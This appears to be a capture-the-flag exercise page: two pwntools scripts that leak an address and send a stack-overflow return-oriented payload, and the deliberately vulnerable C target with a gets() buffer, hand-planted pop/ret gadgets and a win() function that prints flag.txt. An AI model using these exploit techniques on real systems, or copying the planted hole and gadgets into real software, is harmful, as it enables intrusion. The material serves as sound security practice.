ASLR leaked itself
# pwntools driver for the local './pubg' binary: reads one hex value the
# program prints after "coordinate: ", then sends a single line made of
# filler bytes followed by packed 64-bit values.  Statement order is the
# I/O protocol with the child process and must not be rearranged.
from pwn import *

# amd64/Linux target; DEBUG log level echoes every byte sent and received.
context(arch='amd64', os='linux', log_level='DEBUG')
e = ELF('./pubg')
p = e.process()

# Number of filler bytes written before the first 8-byte value.  Presumably
# the distance from the overrun buffer to the saved return address — confirm
# against the binary's stack layout; no source for './pubg' is on this page.
offset: int = 96

# The program prints a hex number after "coordinate: "; int(..., 16) accepts
# the bytes object directly and ignores the trailing newline.
p.recvuntil(b"coordinate: ")
leak: int = int(p.recvline(), 16)
log.info(f"{hex(leak) = }")

payload: bytes = b""
payload += b"A" * offset
# First value: the leaked number minus a fixed constant.  What 0x401306
# refers to is not recoverable from this script — NOTE(review): verify
# against the binary before reusing this value.
payload += p64(leak - 0x0000000000401306)
# Four fixed 0x4012xx addresses.  Fixed code addresses only hold for a
# binary that is not position-independent — assumed here, not shown.
payload += p64(0x0000000000401250)
payload += p64(0x0000000000401257)
payload += p64(0x000000000040125a)
payload += p64(0x0000000000401261)

p.sendline(payload)
p.interactive()
# pwntools driver for './a.out', the C program listed further down this
# page: vuln() prints "victim at: %p" (the address of its 20-byte stack
# buffer) and then calls gets() on that buffer.  Statement order is the
# I/O protocol with the child process and must not be rearranged.
from pwn import *

context(arch="amd64", os="linux", log_level="debug")
e = ELF("./a.out")
p = e.process()

# Parse the hex address vuln() prints after "at: "; int() accepts bytes and
# ignores the trailing newline.
p.recvuntil(b"at: ")
leak: int = int(p.recvline(), 16)
log.info(f"{hex(leak) = }")

# NOTE(review): vuln() prints the address of its stack buffer, not its own
# address, so `base` is not the program's load address.  What e.sym["vuln"]
# resolves to after rebasing depends on the ELF's original load address —
# check the value in the debug log before relying on it.
base: int = leak - e.sym["vuln"]
log.info(f"{hex(base) = }")
e.address = base

payload: bytes = b""
# 32 filler bytes: buffer[20] plus whatever padding and saved registers sit
# between it and the return address — presumably; verify in a debugger.
payload += b"A" * 32
payload += p64(e.sym["vuln"])
# The remaining values alternate fixed 0x4011xx addresses (valid only for a
# non-PIE build — assumed) with the four constants win() compares its
# arguments against: 0xdeadbeef, 0xdeadc0de, 0xcafebabe, 0x8937191.
payload += p64(0x00000000004011DA)
payload += p64(0xDEADBEEF)
payload += p64(0x00000000004011DC)
payload += p64(0xDEADC0DE)
payload += p64(0x0)
payload += p64(0x00000000004011E5)
payload += p64(0xCAFEBABE)
payload += p64(0x00000000004011E2)
payload += p64(0x8937191)
payload += p64(0x0)
payload += p64(0x00000000004011ED)

p.sendline(payload)
p.interactive()
#include <stdio.h>
#include <stdlib.h>
/*
 * Intentionally vulnerable routine that the second pwntools script on this
 * page drives.  Prints the address of a 20-byte stack buffer and then fills
 * it with gets(), which reads up to a newline with no length bound, so input
 * longer than the buffer overwrites whatever lies above it on the stack.
 * The exact layout (buffer size, statement order) is what the script relies
 * on, so the body is left as written.
 */
void vuln() {
    char buffer[20];
    /* Printing a stack address reveals the stack's location to the caller,
     * which is what makes the title "ASLR leaked itself" apt. */
    printf("victim at: %p\n", buffer);
    /* gets() has no bound and was removed from the language in C11; the
     * bounded form is fgets(buffer, sizeof(buffer), stdin). */
    gets(buffer);
}
/* Program entry: runs the vulnerable routine once and exits with success. */
int main(void) {
    vuln();
    return EXIT_SUCCESS;
}
/*
 * Never called from main() on this page.  The body is a sequence of inline
 * asm fragments that each end in "ret", so if a() were ever called, control
 * would leave at the first "ret" (presumably after popping the pushed rbp
 * into rdi) and nothing after that point would run as part of a().  The
 * fragments only serve to place short pop/ret instruction sequences in the
 * binary's text section; the fixed 0x4011xx addresses in the second
 * pwntools script presumably point into them — confirm by disassembling
 * the build, since the compiler may add its own prologue around these.
 * Hand-placed pop/ret sequences like these are worth flagging in any
 * non-challenge codebase: they are exactly what return-oriented chains use.
 */
void a() {
    /* Frame setup written by hand. */
    asm volatile("pushq %rbp\n"      /* save caller's rbp */
                 "movq %rsp, %rbp\n" /* new frame pointer */
    );
    /* pop rdi ; ret */
    asm volatile("popq %rdi\n"
                 "ret\n"
    );
    /* pop rsi ; pop r12 ; ret */
    asm volatile("popq %rsi\n"
                 "popq %r12\n"
                 "ret\n"
    );
    /* pop rcx ; pop r9 ; pop rbp ; ret */
    asm volatile("popq %rcx\n"
                 "popq %r9\n"
                 "popq %rbp\n"
                 "ret\n"
    );
    /* pop rdx ; ret */
    asm volatile("popq %rdx\n"
                 "ret\n"
    );
    /* Single nop, probably padding — the reason is not visible here. */
    asm volatile("nop\n"
    );
    /* pop rbp ; ret — the compiler's own epilogue follows after this. */
    asm volatile("popq %rbp\n"
                 "ret\n"
    );
}
/*
 * Print the contents of flag.txt to stdout when all four arguments carry
 * the expected constants; otherwise print "Not nice!".
 *
 * check, check2, check3, check4: values compared against the fixed
 *   constants below.  The literals exceed INT_MAX and so are unsigned int;
 *   the int arguments are converted to unsigned for the comparison.
 * Returns nothing.  If flag.txt cannot be opened the error is reported via
 * perror() and the function returns without printing anything else.
 */
void win(int check, int check2, int check3, int check4) {
    /* Guard clause: any mismatch ends the call with the rejection message. */
    if (check != 0xdeadbeef || check2 != 0xdeadc0de || check3 != 0xcafebabe ||
        check4 != 0x8937191) {
        puts("Not nice!");
        return;
    }

    FILE *flag = fopen("flag.txt", "r");
    if (flag == NULL) {
        perror("Error opening file");
        return;
    }

    /* fgets() bounds each read to the line buffer; lines longer than the
     * buffer are simply printed in pieces. */
    char line[100];
    while (fgets(line, sizeof line, flag) != NULL) {
        fputs(line, stdout);
    }
    fclose(flag);
}